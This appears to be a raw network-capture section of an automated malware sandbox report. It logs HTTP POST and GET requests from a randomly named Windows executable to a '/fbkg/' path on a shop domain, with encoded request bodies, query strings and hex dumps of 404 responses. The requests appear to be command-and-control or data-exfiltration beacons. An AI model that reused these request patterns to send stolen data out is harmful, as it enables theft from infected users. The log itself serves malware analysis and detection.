                                                                                                                                                                                                Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 18 Nov 2023 18:30:19 GMT; SameSite=Lax
                                                                                                                                                                                                Set-Cookie: _shopify_y=8dcbed1e-473c-464f-8a46-bd774c138a8b; Expires=Sat, 16-Nov-24 18:30:19 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                                                                                                Set-Cookie: _shopify_s=cef691c9-523a-4a47-a245-713ac80fd67f; Expires=Fri, 17-Nov-23 19:00:19 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                                                                                                Server-Timing: processing;dur=98
                                                                                                                                                                                                X-Shopify-Stage: production
                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront
                                                                                                                                                                                                Data Raw:
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 17, 2023 19:30:19.322199106 CET978INData Raw: 73 6f 75 72 63 65 25 35 42 75 75 69 64 25 35 44 3d 37 30 30 31 38 34 66 66 2d 34 39 61 39 2d 34 66 30 33 2d 39 66 62 31 2d 33 61 32 65 36 62 30 64 61 65 33 36 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73
                                                                                                                                                                                                Data Ascii: source%5Buuid%5D=700184ff-49a9-4f03-9fb1-3a2e6b0dae36X-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&sourc
                                                                                                                                                                                                Nov 17, 2023 19:30:19.322309971 CET980INData Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
                                                                                                                                                                                                Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]
                                                                                                                                                                                                Nov 17, 2023 19:30:19.322365999 CET980INData Raw: 8c 18 81 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00 d3 0c
                                                                                                                                                                                                Data Ascii: Yc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVt
                                                                                                                                                                                                Nov 17, 2023 19:30:19.322415113 CET980INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                4123.227.38.7480192.168.11.2050168C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:18.851538897 CET924OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.littlehappiez.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.littlehappiez.com
                                                                                                                                                                                                Referer: http://www.littlehappiez.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 74 52 4a 4b 7a 2b 4c 35 2f 79 6d 31 4c 75 49 6c 74 6c 65 39 5a 36 2b 38 69 6c 37 6f 6d 7a 79 62 73 45 6e 37 39 44 6a 58 59 69 6d 51 4e 65 53 34 4b 73 31 2b 65 76 75 4d 35 35 46 45 38 48 2f 34 7a 72 47 58 76 52 48 36 4e 7a 2b 73 45 76 76 6f 48 5a 62 76 50 57 61 62 47 49 69 6d 75 4e 50 4b 56 47 77 53 52 65 71 2b 2f 70 55 38 4b 71 6d 73 39 4e 4c 2b 77 71 79 53 6e 50 4d 6d 30 52 6a 75 31 57 7a 42 4d 46 5a 7a 76 46 55 6a 6b 33 56 64 70 51 4e 2b 59 32 59 56 33 4c 39 4a 77 49 5a 76 64 50 4d 4b 69 67 67 6d 33 48 57 4b 4e 48 5a 35 50 39 58 68 4f 31 4f 6c 48 69 71 34 59 65 4c 74 50 53 36 45 55 68 70 33 33 34 34 33 42 45 32 6b 48 43 5a 77 48 44 61 42 54 46 2b 35 58 78 4e 53 66 67 67 67 37 43 36 51 32 77 52 36 74 2b 31 2b 66 33 73 4f 39 74 67 47 52 55 76 6f 6a 31 7a 58 58 48 6d 42 77 31 65 72 4a 6a 6d 61 68 33 4c 6a 33 7a 76 31 6e 36 6f 35 45 2f 4d 32 75 74 30 62 46 72 61 2b 67 4b 6f 4b 4e 4b 59 7a 7a 74 4b 30 55 44 72 6a 32 37 47 46 56 53 72 33 56 6b 68 4f 77 72 33 51 66 37 62 37 74 47 75 64 4f 4e 65 37 6f 72 7a 31 43 67 51 63 43 6d 44 49 50 41 35 73 2f 58 30 6e 70 2b 6e 69 4e 67 76 45 73 36 64 70 4e 36 2b 71 64 30 4d 48 4d 6d 52 73 42 65 38 71 73 36 4a 4d 70 2f 73 58 43 4f 6a 34 33 4f 64 59 6e 73 73 6a 6e 4d 41 59 39 4a 71 68 55 37 69 30 78 71 4e 4f 63 2f 67 32 69 4a 6f 55 68 6f 4c 46 43 55 46 64 44 55 48 76 6a 44 50 32 6e 4e 74 4e 43 54 5a 6f 35 65 41 32 4c 4c 76 46 78 48 7a 2f 6d 55 42 41 44 58 50 4a 67 34 41 6d 78 37 2b 47 79 57 4a 43 77 78 4f 6f 78 78 59 36 36 69 48 4b 4e 57 48 65 34 41 53 30 50 61 38 61 4f 53 37 6e 30 73 57 4e 66 5a 5a 77 31 76 77 55 64 48 6d 52 32 6c 39 7a 44 6d 35 74 4a 52 66 7a 35 49 6a 62 46 57 76 6f 4a 56 6f 64 59 65 7a 73 55 46 45 55 64 30 5a 73 55 2b 34 62 74 69 4d 56 33 4f 65 39 46 39 46 70 7a 76 7a 70 50 73 75 4f 57 63 37 63 48 2b 45 52 30 50 69 69 35 33 41 63 6a 66 31 64 37 64 67 71 34 51 67 32 33 50 58 79 6f 73 66 58 4c 56 54 38 73 78 6e 4d 47 52 66 5a 6b 73 52 54 55 31 65 54 6e 73 49 6e 42 35 43 55 52 76 64 76 48 4b 63 6e 77 4d 4a 69 6a 70 47 2f 32 65 6b 34 65 5a 4b 64 79 64 31 72 32 6d 57 67 64 42 6a 39 79 43 39 48 51 6b 52 72 47 4d 74 67 57 37 48 49 59 51 37 64 59 63 52 75 66 55 43 4c 39 71 77 57 30 4a 52 35 67 4a 44 66 75 68 79 43 6f 41 68 6f 62 54 77 59 6f 67 53 72 37 36 4b 4f 34 6b 4b 58 4d 41 6b 53 71 49 6b 42 4d 55 70 6f 68 38 30 31 4a 31 69 76 77 50 41 77 51 79 73 47 52 30 4c 66 78 78 6b 65 5a 2b 2b 6b 6f 2b 4d 75 75 41 66 34 30 56 35 33 32 6a 65 41 53 57 70 33 75 53 78 6e 45 71 6b 76 6f 33 2b 6e 78 4b 78 2b 42 7a 4c 2f 4b 6f 66 31 6d 32 4c 75 42 64 79 72 5a 61 67 34 70 64 64 5a 53 6e 35 48 6b 2f 71 56 69 47 57 35 42 66 71 67 4e 7a 4b 50 38 4a 6a 67 32 64 77 58 53 63 46 49 62 71 31 4f 4f 30 39 6a 69 6c 33 74 53 46 78 66 2f 79 4e 47 75 30 4d 47 72 6c 32 6f 54 49 4a 73 79 6d 55 68 32 4f 4d 2b 37 47 54 50 35 39 6c 4a 45 41 55 43 7a 68 45 67 33 34 79 71 69 75 52 62 4c 6f 64 73 42 32 6a 63 4c 64 42 52 32 45 2b 55 7a 44 42 30 64 56 41 48 69 6a 62 37 79 4c 54 62 77 57 34 56 69 31 42 34 65 45 6a 41 69 59 76 4b 75 6d 6d 6a 66 74 44 66 35 71 58 58 6f 6e 79 30 64 65 41 74 68 59 57 2f 69 78 65 7a 68 48 33 48 58 43 4b 63 32 64 50 32 71 30 46 56 71 63 4a 49 6f 73 53 76 2b 51 4c 42 33 39 4a 75 2f 35 77 2f 76 2b 70 67 77 72 48 30 4e 56 55 53 59 38 4d 64 76 37 46 4f 52 45 44 52 79 4b 32 2b 31 4c 67 45 54 6c 76 31 78 5a 73 79 34 55 67 4c 4f 76 72 42 6b 2b 55 4f 39 65 74 36 31 52 51 48 67 46 4b 38 50 63 42 61 30 46 42 49 4b 4d 69 43 42 54 2f 57 75 6c 58 4e 54 65 4e 65 69 53 57 41 32 66 64 63 4a 4e 6e 57 52 6c 47 79 50 69 5a 4a 6a 6d 66 34 4a 75 6e 57 6f 7a 47 62 44 6b 66 47 61 53 4c 35 74 7a 45 73 54 32 51 5a 6d 7a 33 54 6e 4f 56 51 78 65 66 41 6f 31 4b 75 6c 4d 74 32 30 48 54 6e 67 4b 2f 62 6d 53 47 4b 54 72 31 4c 2f 57 72 47 4b 4e 53 6e 39 79 5a 43 78 59 58 71 39 38 48 58 71 58 42 4d 5a 53 53 6c 43 4d 41 35 39 6c 6c 44 4c 37 41 70 37 61 7a 5a 70 35 59 44 78 72 74 52 77 59 77 5a 79 63 33 30 47 63 74 51 50 47 76 76 73 70 68 73 6a 63 55 43 30 37 77 64 72 63 68 30 6d 52 34 67 6e 74 37 69 77 47 48 45 64 64 4d 71 35 37 62 33 76 5a 76 35 35 73 76 6d 45 6c 50 53 7a 49 6a 7a 50 58 42 59 4c 48 43
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:30:18.851640940 CET934OUTData Raw: 67 42 6c 4c 4f 49 37 58 66 2f 6c 4b 56 41 38 45 42 64 70 54 6c 42 59 47 54 38 33 6b 51 57 59 6c 4f 56 35 67 2b 69 33 6b 2b 37 4a 33 4b 71 36 6a 6a 57 42 45 56 62 59 72 51 37 41 68 33 64 4c 4a 6f 75 4d 2b 46 6f 71 5a 4d 54 55 6d 78 6a 45 41 45 68
                                                                                                                                                                                                Data Ascii: gBlLOI7Xf/lKVA8EBdpTlBYGT83kQWYlOV5g+i3k+7J3Kq6jjWBEVbYrQ7Ah3dLJouM+FoqZMTUmxjEAEhCueSecn7+ih3dcuhCTcwyfxflywMQiBo/2NtsoT0vaa8frv5iWvarFbVt6DH1RAnr6y9MtOWPB3IWtuTJFkYee9elLFedwghuceBusKO6op6GiSn8t6yTMTmPK+c3ZIOnb2dkTPLgZr1DSyS3fa0gXHRtVDjBbJwq
                                                                                                                                                                                                Nov 17, 2023 19:30:18.950208902 CET936OUTData Raw: 5a 4d 38 65 72 35 77 5a 37 4b 48 38 78 76 70 63 47 39 2b 64 56 65 54 61 5a 39 5a 54 36 6a 43 36 50 62 6a 52 70 35 6e 31 79 76 4e 51 58 55 71 70 57 49 51 41 49 37 35 6e 50 61 58 31 36 36 75 2b 44 38 50 43 7a 44 61 53 75 30 52 4d 6f 4f 4d 66 2f 4d
                                                                                                                                                                                                Data Ascii: ZM8er5wZ7KH8xvpcG9+dVeTaZ9ZT6jC6PbjRp5n1yvNQXUqpWIQAI75nPaX166u+D8PCzDaSu0RMoOMf/Mo0rMgUkAVdxGtQxN7RIAMNivKHjIDlobkC+otsBFo6AVwDunzhSv2Zd3ruguF5HeE+gPhnhQ/iUGdEBmJvC7SJOZNM0YVUt+1apjHgDFB2XSDbrWUVrqFU35T1H8EL8LyadWov2RZRlqhFI/UuANQGMlQDPKjmNfC
                                                                                                                                                                                                Nov 17, 2023 19:30:18.950382948 CET937OUTData Raw: 67 6e 66 54 72 76 54 70 78 52 73 2b 30 48 39 34 6d 6b 43 68 78 37 48 6f 63 71 50 35 54 71 4b 58 45 76 61 30 37 66 35 4d 45 4e 6c 66 45 47 6a 6e 63 70 2f 57 4e 54 69 6b 6d 66 58 4c 75 4c 4f 6f 76 39 33 67 47 66 58 6a 56 72 4e 56 62 63 62 32 34 56
                                                                                                                                                                                                Data Ascii: gnfTrvTpxRs+0H94mkChx7HocqP5TqKXEva07f5MENlfEGjncp/WNTikmfXLuLOov93gGfXjVrNVbcb24V9BKh4pwBV6W9L1HSxkqMv/ITUMn4Y24QiKn0z+0MxAmPGMiTSl8ee3CjgW8R3vn3FMjFUlTMrztX9aoJl/jsdgSCCoN34NbfjayAy3kjN6sU9Ymb8O6WReVcP98/MiwkxDooCW++ePCX+pFqHt1vPN8cOxBK3fACJ
                                                                                                                                                                                                Nov 17, 2023 19:30:18.950602055 CET942OUTData Raw: 57 52 54 4b 67 45 6d 36 73 4a 68 44 4f 72 47 44 38 78 6d 73 36 4c 31 65 78 62 79 64 55 41 4c 39 77 4f 74 6b 6e 53 75 59 68 57 45 79 74 6f 63 33 64 6d 71 32 6b 46 76 72 34 78 63 76 4e 2b 2f 4d 63 4d 46 47 41 65 46 55 33 6e 67 54 5a 68 6e 67 30 6b
                                                                                                                                                                                                Data Ascii: WRTKgEm6sJhDOrGD8xms6L1exbydUAL9wOtknSuYhWEytoc3dmq2kFvr4xcvN+/McMFGAeFU3ngTZhng0k68I5rTkLgXZCmo26w0wwX4rREyg4PEO74eTGZ3uq3t0YjvxVjd4Pez+rtKmEw/Kf8/eAcloUBRoL5aNYL5LB9m/Bv0cKShMyK4rX5GPk0MbgmWThV431pqFqrw9DPLhskfcbTGG1YyDn4ccKzpE//Q9gG8GxrZM5N
                                                                                                                                                                                                Nov 17, 2023 19:30:18.950763941 CET943OUTData Raw: 6c 61 33 70 63 63 2f 43 37 74 61 33 38 5a 77 4b 4f 6a 79 51 31 67 41 55 56 39 61 47 39 59 78 72 6f 77 67 30 68 45 74 42 62 79 2b 4c 67 6a 4c 37 6c 62 41 66 2f 6f 31 61 44 2b 43 6f 69 62 6b 59 7a 2b 41 33 2b 71 6c 38 4d 78 51 7a 51 5a 64 49 73 45
                                                                                                                                                                                                Data Ascii: la3pcc/C7ta38ZwKOjyQ1gAUV9aG9Yxrowg0hEtBby+LgjL7lbAf/o1aD+CoibkYz+A3+ql8MxQzQZdIsEodhEuJYJrUht6nRZcfTQQcBfDmQjnRW9XHjW7WDCwYc7d34dfCjtCMrS8aoQ2yCIu1cyA9LoMbPg6Ow4Z2poYUqA6llj3oi2eLog1X/OtplYVhdvDAImkPlcQeSHE3DvPDIxlO4z13E/XLf3UkrBaelPGLVvxUr8d
                                                                                                                                                                                                Nov 17, 2023 19:30:18.950927973 CET950OUTData Raw: 6e 41 77 34 67 58 4c 32 31 66 54 58 69 4b 55 4d 73 42 56 4c 77 48 66 52 4f 4c 69 64 6c 5a 55 38 43 4d 56 74 4c 67 48 6a 6a 43 6b 51 33 65 6a 4d 43 46 74 6a 5a 37 34 39 59 4c 38 52 48 4b 46 39 69 45 70 48 31 57 50 70 39 4d 61 44 4e 6e 71 4d 79 63
                                                                                                                                                                                                Data Ascii: nAw4gXL21fTXiKUMsBVLwHfROLidlZU8CMVtLgHjjCkQ3ejMCFtjZ749YL8RHKF9iEpH1WPp9MaDNnqMyc6xfctpFA/gOySPx3C9/2FsDpDykrjc6bjy/6aO3myrXEI2/CvDrXN3aTDCAZ7h8CgC3W5PsxhcMEGuCWDNo/HtY31djh3R4oJK/pu0ClKZRpIzWRuPswGqviD2AJqlDOVC71ECXnSA55Fxp3GzH6noubH1Xezcxpc
                                                                                                                                                                                                Nov 17, 2023 19:30:18.951109886 CET952OUTData Raw: 48 51 48 48 32 74 57 56 66 37 49 79 50 64 78 4c 50 38 6a 53 4d 4e 63 70 37 72 4c 6a 62 57 6d 45 4b 37 31 7a 39 67 66 50 5a 38 4a 71 61 54 57 5a 70 4d 78 31 51 36 66 78 69 5a 74 36 51 44 46 74 78 38 55 71 31 2f 51 63 52 41 6e 51 6b 45 73 42 56 33
                                                                                                                                                                                                Data Ascii: HQHH2tWVf7IyPdxLP8jSMNcp7rLjbWmEK71z9gfPZ8JqaTWZpMx1Q6fxiZt6QDFtx8Uq1/QcRAnQkEsBV3QL64lfCcMevIa0jBx0b7UvZI+D2IQ/CxjGCu4oBITm6xxh/KYbF508hqDYrmLpHMrQ9iIbN25mc9khXXDk0daYF4K/cnYOhgklrEk24Fidp4f4kdfx7goQV6vnvRvU9gP9Dk+14lR0yf4f4lcfOYfaz8ESYefBveu
                                                                                                                                                                                                Nov 17, 2023 19:30:18.951687098 CET955OUTData Raw: 77 38 47 42 42 65 57 77 66 30 42 41 30 79 54 43 5a 73 44 32 69 65 45 63 4d 53 6b 64 44 73 73 71 42 35 42 73 33 4b 43 54 2f 77 61 68 43 45 69 58 38 35 68 47 31 58 2b 4b 51 58 68 44 50 45 4b 31 53 76 61 59 76 79 44 52 58 4c 6d 6a 66 37 50 52 59 77
                                                                                                                                                                                                Data Ascii: w8GBBeWwf0BA0yTCZsD2ieEcMSkdDssqB5Bs3KCT/wahCEiX85hG1X+KQXhDPEK1SvaYvyDRXLmjf7PRYw7FTm+xb8vODlNUaD3NAg0QGJGwh2UukcUZc1ud3XKQETUoyXvwQn6YbZyXpIFXearfHFBEkbqp/YHRruReaJIfYjh1v6BRjzl7BuRjRmFnP6DR3zqi5fggZJSLX79KHdo4XjDvKElITbAphHuYrKE4jcXpTnwzKf6
                                                                                                                                                                                                Nov 17, 2023 19:30:18.951843977 CET958OUTData Raw: 63 4d 78 6b 6f 51 36 6e 73 50 52 67 39 56 4f 58 46 4d 76 49 6f 67 44 30 42 77 4e 6e 6e 36 6a 78 45 7a 39 76 35 67 4d 6a 55 6b 4f 53 72 49 7a 47 6a 53 2b 52 54 38 54 4f 50 51 66 78 36 63 74 36 35 59 44 34 64 59 71 79 50 46 6a 53 2f 6f 2b 42 55 50
                                                                                                                                                                                                Data Ascii: cMxkoQ6nsPRg9VOXFMvIogD0BwNnn6jxEz9v5gMjUkOSrIzGjS+RT8TOPQfx6ct65YD4dYqyPFjS/o+BUP5sKhjK71lH17MQqyTyea3FSpTWudomAwki1wT+nT9wdWuHsSEBjWd1kcCRnd2+wAXG9xRAy8LkB5MDXT4tQwkd93pexCjoCDgeV/9cSWhmdHi9gMcCju9HoFpz3/uIwc3bPSyivbQzXyA/i/pTml1bqkDUMcn8sV1
                                                                                                                                                                                                Nov 17, 2023 19:30:18.951976061 CET960OUTData Raw: 73 31 79 72 6c 38 54 4e 4a 50 4f 39 79 4a 68 4f 46 46 38 30 53 56 41 70 4a 4d 51 66 55 4a 62 4d 4b 51 4c 6c 46 48 41 39 6f 51 34 62 43 76 39 53 71 71 64 45 54 4c 76 2b 48 58 42 6f 45 43 68 77 4d 65 2f 36 6d 73 77 64 48 57 70 45 4d 62 56 75 76 38
                                                                                                                                                                                                Data Ascii: s1yrl8TNJPO9yJhOFF80SVApJMQfUJbMKQLlFHA9oQ4bCv9SqqdETLv+HXBoEChwMe/6mswdHWpEMbVuv80VFJe6pTEW+O8Y/YBn5mrfRCtFX77b0QoIN0l/ryLOJCr5z931hwbCzXKU7W78OMU1rahI+jor2bDFBK+x9OLczYnVQ6RG6ih9FQOt+ZYNg71uRt27OSaDznvaelaznm6mpqPt7S2c/z/UeUXMLPHqiqMm2teOTgA
                                                                                                                                                                                                Nov 17, 2023 19:30:19.322103977 CET977INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:19 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                X-Sorting-Hat-PodId: 293
                                                                                                                                                                                                X-Sorting-Hat-ShopId: 83935199526
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Vary: Accept
                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                X-ShopId: 83935199526
                                                                                                                                                                                                X-ShardId: 293
                                                                                                                                                                                                Content-Language: en-US
                                                                                                                                                                                                Set-Cookie: localization=US; path=/; expires=Sun, 17 Nov 2024 18:30:19 GMT; SameSite=Lax
                                                                                                                                                                                                Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 18 Nov 2023 18:30:19 GMT; SameSite=Lax
                                                                                                                                                                                                Set-Cookie: _shopify_y=8dcbed1e-473c-464f-8a46-bd774c138a8b; Expires=Sat, 16-Nov-24 18:30:19 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                                                                                                Set-Cookie: _shopify_s=cef691c9-523a-4a47-a245-713ac80fd67f; Expires=Fri, 17-Nov-23 19:00:19 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                                                                                                Server-Timing: processing;dur=98
                                                                                                                                                                                                X-Shopify-Stage: production
                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront
                                                                                                                                                                                                Data Raw:
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Nov 17, 2023 19:30:19.322199106 CET978INData Raw: 73 6f 75 72 63 65 25 35 42 75 75 69 64 25 35 44 3d 37 30 30 31 38 34 66 66 2d 34 39 61 39 2d 34 66 30 33 2d 39 66 62 31 2d 33 61 32 65 36 62 30 64 61 65 33 36 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73
                                                                                                                                                                                                Data Ascii: source%5Buuid%5D=700184ff-49a9-4f03-9fb1-3a2e6b0dae36X-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&sourc
                                                                                                                                                                                                Nov 17, 2023 19:30:19.322309971 CET980INData Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
                                                                                                                                                                                                Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]
                                                                                                                                                                                                Nov 17, 2023 19:30:19.322365999 CET980INData Raw: 8c 18 81 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00 d3 0c
                                                                                                                                                                                                Data Ascii: Yc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVt
                                                                                                                                                                                                Nov 17, 2023 19:30:19.322415113 CET980INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                4223.227.38.7480192.168.11.2050169C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:21.473592043 CET981OUTGET /fbkg/?T6I=gThqwOvIwGDnMNcvwEy/c56UiQuqoTrywE2cwCjfVSyuasLCA8NVIajs9Zxk63n6o6uPmxzzITamFvPAcrLEMG/rHqTHzN/vWA==&Nx1L1=526dgl_phJ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.littlehappiez.com
